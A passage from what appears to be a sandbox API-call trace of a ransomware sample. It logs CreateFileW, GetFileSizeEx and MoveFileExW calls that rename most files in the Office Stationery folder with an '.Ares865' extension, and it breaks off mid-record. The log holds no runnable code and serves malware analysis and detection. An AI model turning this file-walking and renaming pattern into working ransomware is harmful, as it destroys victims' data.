dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.119] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1074) returned 1 [0149.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.123] lstrcpyW (in: lpString1=0x2cce480, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0149.123] lstrlenW (lpString="Desktop.ini") returned 11 [0149.123] lstrlenW (lpString="Ares865") returned 7 [0149.123] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0149.123] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.Ares865") returned 83 [0149.123] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0149.126] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.126] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=645) returned 1 [0149.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.131] lstrcpyW (in: lpString1=0x2cce480, lpString2="Garden.htm" | out: lpString1="Garden.htm") returned="Garden.htm" [0149.131] lstrlenW (lpString="Garden.htm") returned 10 [0149.131] lstrlenW (lpString="Ares865") returned 7 [0149.131] lstrcmpiW (lpString1="den.htm", lpString2="Ares865") returned 1 [0149.131] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.htm.Ares865") returned 82 [0149.131] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.htm.ares865"), dwFlags=0x1) returned 1 [0149.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.133] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=231) returned 1 [0149.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.136] lstrcpyW (in: lpString1=0x2cce480, lpString2="Garden.jpg" | out: lpString1="Garden.jpg") returned="Garden.jpg" [0149.136] lstrlenW (lpString="Garden.jpg") returned 10 [0149.136] lstrlenW (lpString="Ares865") returned 7 [0149.136] lstrcmpiW (lpString1="den.jpg", lpString2="Ares865") returned 1 [0149.136] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.jpg.Ares865") returned 82 [0149.136] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.jpg.ares865"), dwFlags=0x1) returned 1 [0149.138] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Garden.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\garden.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.138] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=23871) returned 1 [0149.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.142] lstrcpyW (in: lpString1=0x2cce480, lpString2="Green Bubbles.htm" | out: lpString1="Green Bubbles.htm") returned="Green Bubbles.htm" [0149.142] lstrlenW (lpString="Green Bubbles.htm") returned 17 [0149.142] lstrlenW (lpString="Ares865") returned 7 [0149.142] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0149.142] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm.Ares865") returned 89 [0149.142] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\green bubbles.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\green bubbles.htm.ares865"), dwFlags=0x1) returned 1 [0149.143] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Green Bubbles.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\green bubbles.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.144] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0149.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.144] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.147] lstrcpyW (in: lpString1=0x2cce480, lpString2="GreenBubbles.jpg" | out: lpString1="GreenBubbles.jpg") returned="GreenBubbles.jpg" [0149.147] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0149.147] lstrlenW (lpString="Ares865") returned 7 [0149.147] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0149.147] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg.Ares865") returned 88 [0149.148] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.ares865"), dwFlags=0x1) returned 1 [0149.149] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.149] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6406) returned 1 [0149.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.149] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.152] lstrcpyW (in: lpString1=0x2cce480, lpString2="Hand Prints.htm" | out: lpString1="Hand Prints.htm") returned="Hand Prints.htm" [0149.152] lstrlenW (lpString="Hand Prints.htm") returned 15 [0149.153] lstrlenW (lpString="Ares865") returned 7 [0149.153] lstrcmpiW (lpString1="nts.htm", lpString2="Ares865") returned 1 [0149.153] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm.Ares865") returned 87 [0149.153] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\hand prints.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\hand prints.htm.ares865"), dwFlags=0x1) returned 1 [0149.154] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\hand prints.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.155] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=235) returned 1 [0149.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.158] lstrcpyW (in: lpString1=0x2cce480, lpString2="HandPrints.jpg" | out: lpString1="HandPrints.jpg") returned="HandPrints.jpg" [0149.158] lstrlenW (lpString="HandPrints.jpg") returned 14 [0149.158] lstrlenW (lpString="Ares865") returned 7 [0149.158] lstrcmpiW (lpString1="nts.jpg", lpString2="Ares865") returned 1 [0149.158] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg.Ares865") returned 86 [0149.158] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\handprints.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\handprints.jpg.ares865"), dwFlags=0x1) returned 1 [0149.160] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\handprints.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.160] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4222) returned 1 [0149.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.160] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.163] lstrcpyW (in: lpString1=0x2cce480, lpString2="Orange Circles.htm" | out: lpString1="Orange Circles.htm") returned="Orange Circles.htm" [0149.163] lstrlenW (lpString="Orange Circles.htm") returned 18 [0149.163] lstrlenW (lpString="Ares865") returned 7 [0149.163] lstrcmpiW (lpString1="les.htm", lpString2="Ares865") returned 1 [0149.164] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm.Ares865") returned 90 [0149.164] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orange circles.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orange circles.htm.ares865"), dwFlags=0x1) returned 1 [0149.165] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orange circles.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.165] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0149.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.169] lstrcpyW (in: lpString1=0x2cce480, lpString2="OrangeCircles.jpg" | out: lpString1="OrangeCircles.jpg") returned="OrangeCircles.jpg" [0149.169] lstrlenW (lpString="OrangeCircles.jpg") returned 17 [0149.169] lstrlenW (lpString="Ares865") returned 7 [0149.169] lstrcmpiW (lpString1="les.jpg", lpString2="Ares865") returned 1 [0149.169] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg.Ares865") returned 89 [0149.169] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orangecircles.jpg.ares865"), dwFlags=0x1) returned 1 [0149.171] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\OrangeCircles.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\orangecircles.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.171] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6381) returned 1 [0149.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.171] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.174] lstrcpyW (in: lpString1=0x2cce480, lpString2="Peacock.htm" | out: lpString1="Peacock.htm") returned="Peacock.htm" [0149.174] lstrlenW (lpString="Peacock.htm") returned 11 [0149.174] lstrlenW (lpString="Ares865") returned 7 [0149.174] lstrcmpiW (lpString1="ock.htm", lpString2="Ares865") returned 1 [0149.174] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.htm.Ares865") returned 83 [0149.174] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.htm.ares865"), dwFlags=0x1) returned 1 [0149.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.176] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=232) returned 1 [0149.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.176] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.180] lstrcpyW (in: lpString1=0x2cce480, lpString2="Peacock.jpg" | out: lpString1="Peacock.jpg") returned="Peacock.jpg" [0149.180] lstrlenW (lpString="Peacock.jpg") returned 11 [0149.180] lstrlenW (lpString="Ares865") returned 7 [0149.180] lstrcmpiW (lpString1="ock.jpg", lpString2="Ares865") returned 1 [0149.180] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg.Ares865") returned 83 [0149.180] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.jpg.ares865"), dwFlags=0x1) returned 1 [0149.182] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Peacock.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\peacock.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.182] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5115) returned 1 [0149.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.185] lstrcpyW (in: lpString1=0x2cce480, lpString2="Roses.htm" | out: lpString1="Roses.htm") returned="Roses.htm" [0149.185] lstrlenW (lpString="Roses.htm") returned 9 [0149.185] lstrlenW (lpString="Ares865") returned 7 [0149.185] lstrcmpiW (lpString1="ses.htm", lpString2="Ares865") returned 1 [0149.185] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.htm.Ares865") returned 81 [0149.185] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.htm.ares865"), dwFlags=0x1) returned 1 [0149.187] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.187] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=233) returned 1 [0149.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.187] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.190] lstrcpyW (in: lpString1=0x2cce480, lpString2="Roses.jpg" | out: lpString1="Roses.jpg") returned="Roses.jpg" [0149.190] lstrlenW (lpString="Roses.jpg") returned 9 [0149.190] lstrlenW (lpString="Ares865") returned 7 [0149.190] lstrcmpiW (lpString1="ses.jpg", lpString2="Ares865") returned 1 [0149.191] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.jpg.Ares865") returned 81 [0149.191] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.jpg.ares865"), dwFlags=0x1) returned 1 [0149.192] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Roses.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\roses.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1920) returned 1 [0149.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.196] lstrcpyW (in: lpString1=0x2cce480, lpString2="Shades of Blue.htm" | out: lpString1="Shades of Blue.htm") returned="Shades of Blue.htm" [0149.196] lstrlenW (lpString="Shades of Blue.htm") returned 18 [0149.196] lstrlenW (lpString="Ares865") returned 7 [0149.196] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0149.196] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm.Ares865") returned 90 [0149.196] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shades of blue.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shades of blue.htm.ares865"), dwFlags=0x1) returned 1 [0149.197] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Shades of Blue.htm.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shades of blue.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.198] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=237) returned 1 [0149.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.202] lstrcpyW (in: lpString1=0x2cce480, lpString2="ShadesOfBlue.jpg" | out: lpString1="ShadesOfBlue.jpg") returned="ShadesOfBlue.jpg" [0149.202] lstrlenW (lpString="ShadesOfBlue.jpg") returned 16 [0149.202] lstrlenW (lpString="Ares865") returned 7 [0149.202] lstrcmpiW (lpString1="lue.jpg", lpString2="Ares865") returned 1 [0149.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg.Ares865") returned 88 [0149.202] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.ares865"), dwFlags=0x1) returned 1 [0149.204] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg.Ares865" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\shadesofblue.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0149.204] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4734) returned 1 [0149.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0149.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0149.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0149.207] lstrcpyW (in: lpString1=0x2cce480, lpString2="Soft Blue.htm" | out: lpString1="Soft Blue.htm") returned="Soft Blue.htm" [0149.207] lstrlenW (lpString="Soft Blue.htm") returned 13 [0149.207] lstrlenW (lpString="Ares865") returned 7 [0149.207] lstrcmpiW (lpString1="lue.htm", lpString2="Ares865") returned 1 [0149.207] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm.Ares865") returned 85 [0149.208] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\stationery\\soft blue.htm"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Stationery\\Soft 